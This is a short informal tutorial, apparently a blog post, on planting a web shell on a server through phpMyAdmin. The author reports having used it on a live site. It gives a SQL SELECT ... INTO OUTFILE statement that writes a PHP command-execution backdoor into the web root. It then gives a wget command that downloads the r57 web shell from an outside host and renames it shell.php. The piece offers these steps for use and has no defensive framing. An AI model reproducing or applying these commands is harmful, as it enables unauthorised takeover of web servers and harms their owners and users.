-You must have the full path
-pma & mysql db privileges.
Its not every day u get to use this its rare, but today i exploited a site by this so thought of writing a tutorial. Ok then lets start.

First login in to mysql

now click ‘Show MySQL system varible”

then ‘SQL’.

now you can run sql commands,like create db, delete tables or whatever. we want to upload shell so lets move on to it.
now we will create a cmd line into a new file,with select into.

SELECT “<? system($_REQUEST[‘cmd’]); ?>” INTO OUTFILE “full/path/here/cmd.php”

and click ‘Go’.

Now, the cmd line is here http://site.com/cmd.php lets run the command to get shell.

wget http://www.r57.biz/r57.txt;mv r57.txt shell.php

 

N thats it, we have shell on the server xD
Stay Safe and gud luck 🙂

Advertisements